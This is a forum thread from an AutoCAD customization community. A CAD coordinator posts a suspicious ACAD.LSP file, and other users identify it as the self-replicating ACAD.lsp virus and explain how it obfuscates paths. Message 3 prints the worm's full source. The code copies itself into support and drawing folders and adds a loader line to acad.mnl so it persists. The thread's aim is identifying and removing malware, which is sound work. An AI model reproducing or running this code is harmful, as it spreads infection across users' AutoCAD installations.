Community
Visual LISP, AutoLISP and General Customization
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Show  only  | Search instead for 
Did you mean: 

Can you interpret this LISP routine for me

7 REPLIES 7
SOLVED
Back to AutoCAD Customization Category
Back to Topic Listing
Reply
Message 1 of 8
kbiggs
Advocate
1451 Views, 7 Replies
‎03-19-2012 01:18 PM
‎03-19-2012 01:18 PM

Can you interpret this LISP routine for me

I am not familiar with understanding LISP routines and would like feedback on this one. I am not sure what it does or how it gets loaded, however, it is not a LISP routine that I have setup. There is some thought this may be some sort of virus. I am attaching a screen shot, so as not replicate this LISP routine. The LISP routine name is ACAD.LSP, which is loaded and saved to all users computers. Hopefully someone can help with this.

 

Regards,

 

Keith Biggs
CAD Tech Coordinator

R.F. Binnie & Associates Ltd.

Preview file
83 KB
Report
0 Likes
Reply
7 REPLIES 7
Message 2 of 8
dbroad
Mentor
in reply to: kbiggs
‎03-19-2012 01:42 PM
‎03-19-2012 01:42 PM

Post the code, not a microscopic png.  Make it possible for us to read the code.

Architect, Registered NC, VA, SC, & GA.
Report
0 Likes
Reply
Message 3 of 8
kbiggs
Advocate
in reply to: kbiggs
‎03-19-2012 01:59 PM
‎03-19-2012 01:59 PM

Sorry you could not read it, it seemed readable to me before I posted it. Here is the code:

 

************************************************

 

(setvar "cmdecho" 0)
(vl-load-com)
(setq ndwg (getvar "dwgname"))
(if (= "Drawing1.dwg" ndwg)
  (command "save" "Drawing1.dwg" "")
)
(setq d1 (strcat (chr 97)
   (chr 99)
   (chr 97)
   (chr 100)
   (chr 97)
   (chr 112)
   (chr 112)
   (chr 112)
  )
)
(setq d2 (strcat (chr 97)
   (chr 99)
   (chr 97)
   (chr 100)
   (chr 97)
   (chr 112)
   (chr 112)
   (chr 112)
   (chr 46)
   (chr 108)
   (chr 115)
   (chr 112)
  )
)
----------------
(setq d3 (strcat (chr 97)
   (chr 99)
   (chr 97)
   (chr 100)
   (chr 97)
   (chr 112)
   (chr 112)
   (chr 46)
   (chr 108)
   (chr 115)
   (chr 112)
  )
)
(setq path (findfile "base.dcl"))
(setq path (substr path 1 (- (strlen path) 8)))
(setq path1 (strcat path d2))
(setq path3 (strcat path d3))
(setq nowdwg (getvar "dwgname"))
(setq wjqm (findfile nowdwg))
(setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))
(setq path2 (strcat dwgpath "acad.lsp"))
(SETQ fp1 (findfile path1))
(if (= fp1 nil)
  (vl-file-copy path2 path1)
)
(SETQ fp2 (findfile path2))
(if (= fp2 nil)
  (vl-file-copy path1 path2)
)
;;ÈôÒѾ­´æÔÚacad.lsp£¬Ôòɾ³ýÔÙ¸´ÖÆ
(if (/= fp2 nil)
  (progn (vl-file-delete path2) (vl-file-copy path1 path2))
)
---------------------------------------------------------------
(SETQ fp3 (findfile path3))
(if (/= fp3 nil)
  (progn (setq wjm (open path3 "r"))
  (setq wjm (read-line wjm))
  (if (/= wjm ";;;")
    (progn (setq wj (open path3 "w"))
    (write-line ";;;" wj)
    (close wj)
    )
  )
  )
)
(defun s::startup ()
  (setvar "cmdecho" 0)
  (setq lspmnl 0)
  (setq path (findfile "base.dcl"))
  (setq path (substr path 1 (- (strlen path) 8)))
  (setq wjqm (strcat path
       (strcat (chr 97)
        (chr 99)
        (chr 97)
        (chr 100)
        (chr 46)
        (chr 109)
        (chr 110)
        (chr 108)
       )
      )
  )
  (if (setq wjm (open wjqm "r"))
    (progn (while (setq wz (read-line wjm))
      (setq ns1 ns2)
      (setq ns2 wz)
    )
    (if (> (strlen ns1) 14)
      (if (= (substr ns1 8 😎 d1)
        (setq lspmnl 1)
      )
    )
    (close wjm)
    )
  )
  (if (= lspmnl 0)
    (progn (setq wjqm (strcat path
         (strcat (chr 97)
          (chr 99)
          (chr 97)
          (chr 100)
          (chr 46)
          (chr 109)
          (chr 110)
          (chr 108)
         )
        )
    )
    (setq wjm (open wjqm "a"))
    (write-line (strcat "(load " (chr 34) d2 (chr 34) ")") wjm)
    (write-line "(princ)" wjm)
    (close wjm)
    )
  )
)
(princ "\nACAD²¡¶¾ÃâÒß¿ªÆô by netbee 2009.04")
(princ)

 

*****************************************************************

 

Thanks,

 

Keith Biggs
CAD Tech Coordinator

R.F. Binnie & Associates Ltd.

Report
0 Likes
Reply
Message 4 of 8
dgorsman
Consultant
in reply to: kbiggs
‎03-19-2012 02:05 PM
‎03-19-2012 02:05 PM

Yeah, looks like the classic ACAD.lsp virus.  Self-replicates all over the place.  See all those (strcat...) and (chr...) functions?  Creates path strings using ASCII characters rather than human-readable strings, which is a dead giveaway somethings not right.

 

Check the knowledge base, there are removal instructions there which are clear.  You need to approach this in a very logical, plodding, and methodical manner.  No handwaving, skipping users computers because "I don't have time right now", blahblahblah.  Make sure you hit up *every* AutoCAD using computer in the network, including users who are on holidays or at site, laptops, users who are running their own copy or bootlegs of AutoCAD, etc.  If you don't, it will be back.  You might need to blow out any routines being loaded through the StartApp list as well, just to be certain.

----------------------------------
If you are going to fly by the seat of your pants, expect friction burns.
"I don't know" is the beginning of knowledge, not the end.


Report
0 Likes
Reply
Message 5 of 8
kbiggs
Advocate
in reply to: kbiggs
‎03-19-2012 02:11 PM
‎03-19-2012 02:11 PM

Thanks for the not so good news. I will have a look at the knowledgebase articles how to remove this, will have to involve our IT department, they might have more resources that me to resolve this.

 

Thanks again,

 

Keith Biggs
CAD Tech Coordinator

R.F. Binnie & Associates Ltd.

Report
0 Likes
Reply
Message 6 of 8
stevor
Collaborator
in reply to: kbiggs
‎03-20-2012 05:50 AM
‎03-20-2012 05:50 AM

One name to search on is the  worm, or virus, "ALS/Bursted".

It is found by Avast, etal,  and much is written about the method, which is:

 Hide a small  'loader code' in a list of 'chr statements.

 Hide the much bigger actual malware code elsewhere, like in an image file.

 

One example, as in  the ALS.Bursted form, includes:

(vl-list->string '(108 111 103 111 46 103 105 102))

which creates the string: logo.gif

albiet other commands and files are also required to execute.

 

There are so many permutations of this technique that:

 

In general, do not allow, much less load, anything you cannot read, and   check.

S
Report
0 Likes
Reply
Message 7 of 8
dbroad
Mentor
in reply to: kbiggs
‎03-20-2012 07:59 AM
‎03-20-2012 07:59 AM

Now that we recognize this as a virus, it would be a good time for the moderator to trim the listing or hobble it so that someone couldn't accidentally paste it into vlide and trigger the virus.  Sorry I asked for the listing but I couldn't quite read the png file.

Architect, Registered NC, VA, SC, & GA.
Report
0 Likes
Reply
Message 8 of 8
dgorsman
Consultant
in reply to: dbroad
‎03-20-2012 11:21 AM
‎03-20-2012 11:21 AM

Zoom factor in browser made it clear enough 🙂

----------------------------------
If you are going to fly by the seat of your pants, expect friction burns.
"I don't know" is the beginning of knowledge, not the end.


Report
0 Likes
Reply
Reply

Can't find what you're looking for? Ask the community or share your knowledge.

Post to forums  

Autodesk Design & Make Report

”Boost

 

Report a website issue